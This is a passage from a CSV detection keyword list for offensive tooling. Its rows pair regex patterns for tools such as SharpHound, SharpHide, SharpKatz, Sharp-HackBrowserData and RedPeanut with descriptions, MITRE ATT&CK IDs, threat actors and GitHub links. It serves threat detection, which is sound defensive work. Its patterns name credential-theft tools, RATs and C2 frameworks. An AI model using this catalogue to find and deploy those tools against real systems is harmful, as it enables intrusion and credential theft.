(Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","1","N/A","10","10","250","43","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" "*SharpGPOAbuse*",".{0,1000}SharpGPOAbuse.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a users edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1204 - T1484 - T1556 - T1574 - T1562","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/FSecureLABS/SharpGPOAbuse","1","1","N/A","N/A","10","951","133","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" "*SharpGPOAbuse*",".{0,1000}SharpGPOAbuse.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","1","N/A","N/A","10","951","133","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" "*SharpGPOAbuse.exe*",".{0,1000}SharpGPOAbuse\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpGPOAddComputer*",".{0,1000}SharpGPOAddComputer.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpGPOAddLocalAdmin*",".{0,1000}SharpGPOAddLocalAdmin.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpGPOAddUser*Manager*",".{0,1000}SharpGPOAddUser.{0,1000}Manager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*Sharp-HackBrowserData*",".{0,1000}Sharp\-HackBrowserData.{0,1000}","offensive_tool_keyword","cobaltstrike","C# binary with embeded golang hack-browser-data","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData","1","1","N/A","10","10","94","17","2021-12-09T18:58:27Z","2020-12-06T12:28:47Z" "*Sharp-HackBrowserData*",".{0,1000}Sharp\-HackBrowserData.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","10","10012","1478","2024-05-01T17:51:49Z","2020-06-18T03:24:31Z" "*SharpHandler.exe*",".{0,1000}SharpHandler\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpHide running as elevated user*",".{0,1000}SharpHide\srunning\sas\selevated\suser.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","0","N/A","9","5","459","94","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" "*SharpHide.csproj*",".{0,1000}SharpHide\.csproj.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","459","94","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" "*SharpHide.exe*",".{0,1000}SharpHide\.exe.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","459","94","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" "*SharpHide.sln*",".{0,1000}SharpHide\.sln.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","459","94","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" "*SharpHide-master*",".{0,1000}SharpHide\-master.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","459","94","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" "*SharpHide-N*.exe*",".{0,1000}SharpHide\-N.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*SharpHose.exe*",".{0,1000}SharpHose\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*sharphound -*",".{0,1000}sharphound\s\-.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*SharpHound-*.zip*",".{0,1000}SharpHound\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*sharphound*--stealth*",".{0,1000}sharphound.{0,1000}\-\-stealth.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*sharphound.*",".{0,1000}sharphound\..{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*SharpHound.cna*",".{0,1000}SharpHound\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","39","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" "*SharpHound.exe*",".{0,1000}SharpHound\.exe.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","9395","1668","2024-02-09T22:50:23Z","2016-04-17T18:36:14Z" "*SharpHound.exe*",".{0,1000}SharpHound\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","39","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" "*SharpHound.exe*",".{0,1000}SharpHound\.exe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*sharphound.exe*",".{0,1000}sharphound\.exe.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","1","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "*SharpHound.exe*",".{0,1000}SharpHound\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpHound.exe*",".{0,1000}SharpHound\.exe.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*SharpHound.exe*",".{0,1000}SharpHound\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*SharpHound.ps1*",".{0,1000}SharpHound\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*SharpHound.ps1*",".{0,1000}SharpHound\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","39","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" "*SharpHound.ps1*",".{0,1000}SharpHound\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*SharpHound.ps1*",".{0,1000}SharpHound\.ps1.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*SharpHound.ps1*",".{0,1000}SharpHound\.ps1.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*SharpHound.ps1*",".{0,1000}SharpHound\.ps1.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*SharpHound2*",".{0,1000}SharpHound2.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*Sharphound2.*",".{0,1000}Sharphound2\..{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","39","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" "*SharpHound3*",".{0,1000}SharpHound3.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*Sharphound-Aggressor*",".{0,1000}Sharphound\-Aggressor.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor scripts for use with Cobalt Strike 3.0+","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","10","10","39","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z" "*SharpHoundCommon.*",".{0,1000}SharpHoundCommon\..{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*SharpHoundCommonLib*",".{0,1000}SharpHoundCommonLib.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*sharpinline *",".{0,1000}sharpinline\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*Sharpkatz*",".{0,1000}Sharpkatz.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpKatz.exe*",".{0,1000}SharpKatz\.exe.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","1","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*SharpKatz.exe*",".{0,1000}SharpKatz\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SharpKatz.exe*",".{0,1000}SharpKatz\.exe.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*SharpkatzManager*",".{0,1000}SharpkatzManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 